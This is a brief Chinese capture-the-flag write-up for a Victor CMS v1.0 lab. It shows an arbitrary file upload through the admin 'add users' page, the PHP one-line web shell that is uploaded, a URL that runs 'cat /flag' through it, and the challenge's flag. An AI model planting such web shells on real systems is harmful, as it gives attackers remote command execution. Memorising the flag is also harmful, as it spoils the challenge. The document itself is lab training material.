春秋云镜 CVE-2022-26201( CVE-2021-25203) Victor CMS v1.0 存在二次注入漏洞
靶标介绍
Victor CMS v1.0 存在二次注入漏洞,与CVE-2022-28060同一套cms。
启动场景
漏洞利用
(此题利用漏洞为 CVE-2021-25203Victor-CMS 1.0 —— 任意文件上传漏洞)
进入“Admin”页面
“Users” / “add users”
构造一句话木马shell.php
<?php system($_GET[cmd]);?>
直接上传shell.php
http://eci-2ze0t0n7rf1wsq9bk77e.cloudeci1.ichunqiu.com/img/shell.php?cmd=cat /flag
得到flag
flag{ad1e4db5-9b69-4d0b-8dc7-54346c050399}